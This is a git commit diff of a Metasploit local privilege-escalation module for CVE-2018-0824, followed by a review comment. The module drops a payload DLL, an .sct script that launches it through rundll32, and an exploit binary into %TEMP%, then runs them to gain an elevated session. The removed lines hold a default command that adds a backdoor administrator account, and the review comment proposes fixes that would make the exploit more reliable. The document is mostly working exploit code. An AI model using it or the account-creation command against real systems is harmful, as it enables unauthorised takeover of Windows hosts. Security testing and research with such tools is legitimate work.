Update stuff

GSoC/Meterpreter_Web_Console
bwatters-r7 2018-10-17 17:17:05 -05:00
parent 629f4c190d
commit d2c013001d
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
3 changed files with 151 additions and 94 deletions

external/source/exploits/CVE-2018-0824/UnmarshalPwn.vcxproj vendored Normal file → Executable file

@ -1,4 +1,4 @@
<?xml version="1.0" encoding="utf-8"?> <?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations"> <ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32"> <ProjectConfiguration Include="Debug|Win32">
@ -29,7 +29,7 @@
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType> <ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries> <UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset> <PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet> <CharacterSet>Unicode</CharacterSet>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
@ -42,13 +42,13 @@
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType> <ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries> <UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset> <PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet> <CharacterSet>Unicode</CharacterSet>
</PropertyGroup> </PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType> <ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries> <UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v141</PlatformToolset> <PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization> <WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet> <CharacterSet>Unicode</CharacterSet>
</PropertyGroup> </PropertyGroup>
@ -138,6 +138,7 @@
<SDLCheck>true</SDLCheck> <SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode> <ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile> </ClCompile>
<Link> <Link>
<SubSystem>Console</SubSystem> <SubSystem>Console</SubSystem>


@ -2,10 +2,18 @@
# Current source: https://github.com/rapid7/metasploit-framework # Current source: https://github.com/rapid7/metasploit-framework
## ##
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'
require 'msf/core/exploit/exe'
class MetasploitModule < Msf::Exploit::Local class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Post::Common
include Msf::Post::File include Msf::Post::File
include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv
include Msf::Exploit::EXE
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -30,105 +38,153 @@ class MetasploitModule < Msf::Exploit::Local
'DisclosureDate' => 'Aug 05 2018', 'DisclosureDate' => 'Aug 05 2018',
'Arch' => [ARCH_X64], 'Arch' => [ARCH_X64],
'SessionTypes' => ['meterpreter'], 'SessionTypes' => ['meterpreter'],
'License' => MSF_LICENSE 'Platform' => ['win'],
'Targets' =>
[
['Windows x64', { 'Arch' => ARCH_X64 }]
],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'False'
}
)) ))
register_options( register_options(
[ [
OptString.new('POCCMD', [true, 'The command to run from poc.sct', '/k net user msfadmin P@ssw0rd /add && net localgroup administrators msfadmin /add']), OptString.new('EXPLOIT_NAME',
OptString.new('READFILE', [ false, 'Read a remote file: ', 'C:\\Windows\\boot.ini' ]) [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
OptString.new('SCRIPT_NAME',
[false, 'The filename to use for the COM script file (%RAND% by default).', nil]),
OptString.new('PAYLOAD_NAME',
[false, 'The filename for the payload dll be used on the target host.', nil]),
OptString.new('PATH',
[false, 'Path to write binaries (%TEMP% by default).', nil]),
]) ])
end end
def write_poc_to_target(rpoc, rpocname) def setup
super
validate_active_host
@exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
@payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
@script_name = datastore['SCRIPT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
@exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i)
@payload_name = "#{payload_name}.dll" unless payload_name.match(/\.dll$/i)
@script_name = "#{script_name}.sct" unless payload_name.match(/\.sct$/i)
@temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP')
@payload_path = "#{temp_path}\\#{payload_name}"
@exploit_path = "#{temp_path}\\#{exploit_name}"
@script_path = "#{temp_path}\\#{script_name}"
@payload_dll = generate_payload_dll
end
def validate_active_host
begin
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
raise Msf::Exploit::Failed, 'Could not connect to session'
end
end
def validate_remote_path(path)
unless directory?(path)
fail_with(Failure::Unreachable, "#{path} does not exist on the target")
end
end
def validate_target
if sysinfo['Architecture'] == ARCH_X86
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
end
if sysinfo['OS'] =~ /XP/
fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP')
end
end
def ensure_clean_destination(path)
if file?(path)
print_status("#{path} already exists on the target. Deleting...")
begin begin
print_warning("writing to %TEMP%") file_rm(path)
temppoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname print_status("Deleted #{path}")
write_sct_to_target(temppoc,rpoc) rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_error("Unable to delete #{path}")
end end
end
print_good("Persistent Script written to #{temppoc}")
temppoc
end
def write_sct_to_target(temppoc,rpoc)
fd = session.fs.file.new(temppoc, "w")
fd.write(rpoc)
fd.close
end end
def app_poc_on_target(append,rpocname) def upload_exploit
appendpoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'UnmarshalPwn.exe')
fd = session.fs.file.new(appendpoc, "a") upload_file(exploit_path, local_exploit_path)
fd.write(append) print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
fd.close
end
def create_sct_file(txt)
print_status("Reading Payload from file #{txt}")
::IO.read(txt)
end
def write_exe_to_target(rexe, rexename)
begin
print_warning("writing to %TEMP%")
temprexe = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
write_file_to_target(temprexe,rexe)
end
print_good("Persistent Script written to #{temprexe}")
temprexe
end
def write_file_to_target(temprexe,rexe)
fd = session.fs.file.new(temprexe, "wb")
fd.write(rexe)
fd.close
end
def create_payload_from_file(exec)
print_status("Reading Payload from file #{exec}")
::IO.read(exec)
end
def run
rexename = Rex::Text.rand_text_alphanumeric(10) + ".exe"
print_status("exe name is: #{rexename}")
rpocname = Rex::Text.rand_text_alphanumeric(10) + ".sct"
print_status("poc name is: #{rpocname}")
poccmd = datastore['POCCMD']
cmdcheck = datastore['CMDCHECK']
rexe = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'UnmarshalPwn.exe')
raw = create_payload_from_file rexe
script_on_target = write_exe_to_target(raw, rexename)
rpoc = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'poc_header')
rawsct = create_sct_file rpoc
poc_on_target = write_poc_to_target(rawsct, rpocname)
cmdpoc = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
fd = session.fs.file.new(cmdpoc, "a")
fd.write(poccmd)
fd.close
rpoc1 = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'poc_footer')
append = create_payload_from_file rpoc1
append_on_target = app_poc_on_target(append, rpocname)
print_status('Starting module...')
print_line('')
command = session.fs.file.expand_path("%TEMP%") + "\\" + rexename
print_status("Location of UnmarshalPwn.exe is: #{command}")
command1 = session.fs.file.expand_path("%TEMP%") + "\\" + rpocname
print_status("Location of poc.sct is: #{command1}")
command += " "
command += "#{command1}"
print_status("Executing command : #{command}")
command_output = cmd_exec(command)
print_line(command_output)
print_line('')
end end
def upload_payload
write_file(payload_path, payload_dll)
print_status("Payload (#{payload_dll.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
end
def upload_script
vprint_status("Creating the sct file with payload #{payload_path}")
local_script_template_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-0824', 'script_template')
script_template_data = ::IO.read(local_script_template_path)
temp_path = payload_path
print_status("Payload path: #{temp_path}")
temp_path.gsub!('\\', '\\\\\\\\')
print_status("Payload path: #{temp_path}")
vprint_status("script_template_data.length = #{script_template_data.length}")
command = 'cmd.exe /c rundll32.exe ' + payload_path.gsub("\\", "\\\\\\\\") + ',0'
# script_data = script_template_data.sub!('SCRIPTED_COMMAND', command)
script_data = script_template_data.sub!('SCRIPTED_COMMAND', command)
if script_data == nil
fail_with(Failure::BadConfig, "Failed to substitute command in script_template")
end
vprint_status("Writing #{script_data.length} bytes to #{script_path} to target")
write_file(script_path, script_data)
vprint_status('Script uploaded successfully')
end
def exploit
print_status("exploit path is: #{exploit_path}")
print_status("payload path is: #{payload_path}")
print_status("script path is: #{script_path}")
begin
validate_active_host
validate_target
validate_remote_path(temp_path)
ensure_clean_destination(exploit_path)
ensure_clean_destination(payload_path)
ensure_clean_destination(script_path)
vprint_status("Uploading Payload to #{payload_path}")
upload_payload
vprint_status("Uploading Script to #{script_path}")
upload_script
vprint_status("Uploading Exploit to #{exploit_path}")
upload_exploit
vprint_status('Launching Exploit...')
command_output = cmd_exec(exploit_path + ' ' + script_path)
vprint_status(command_output)
print_good('Exploit completed, wait for elevated session')
rescue Rex::Post::Meterpreter::RequestError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
print_good('Exploit failed, cleaning up')
print_error(e.message)
ensure_clean_destination(exploit_path)
ensure_clean_destination(payload_path)
ensure_clean_destination(script_path)
end
end
attr_reader :exploit_name
attr_reader :payload_name
attr_reader :script_name
attr_reader :payload_dll
attr_reader :temp_path
attr_reader :exploit_path
attr_reader :payload_path
attr_reader :script_path
end end
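Review bot: In `setup`, the suffix check `@script_name = "#{script_name}.sct" unless payload_name.match(/\.sct$/i)` tests `payload_name` instead of `script_name`, so a SCRIPT_NAME option that already ends in `.sct` gets the suffix appended a second time; it should read `@script_name = "#{script_name}.sct" unless script_name.match(/\.sct\z/i)` (and `\z` rather than `$` is the safer anchor for the `.exe` and `.dll` checks above it as well). In `upload_script`, `temp_path = payload_path` aliases the `@payload_path` string and the following `temp_path.gsub!('\\', '\\\\\\\\')` mutates it in place, so every later use of `payload_path` — the `gsub` on the `rundll32` line and the `ensure_clean_destination(payload_path)` calls in `exploit` — sees a path whose backslashes are already doubled, and the local also shadows the `temp_path` reader declared at the bottom of the class; unless the script template really needs that second level of escaping (not visible here), the four lines from `temp_path = payload_path` through the second `print_status("Payload path: #{temp_path}")` can be dropped, otherwise compute it non-destructively as `escaped_payload_path = payload_path.gsub('\\', '\\\\\\\\')`. In `exploit`, `cmd_exec(exploit_path + ' ' + script_path)` passes both paths unquoted, so a PATH option or a %TEMP% value containing a space splits the arguments; `cmd_exec("\"#{exploit_path}\" \"#{script_path}\"")` avoids that. The cleanup in `exploit` only runs from the `rescue Rex::Post::Meterpreter::RequestError` branch, so a `fail_with` raised after `upload_payload` (for example the `Failure::BadConfig` in `upload_script`) leaves the uploaded DLL on the target; moving the three `ensure_clean_destination` calls into an `ensure` clause, or at least rescuing `Msf::Exploit::Failed` too, would cover that path, and the failure message should be `print_error('Exploit failed, cleaning up')` rather than `print_good`.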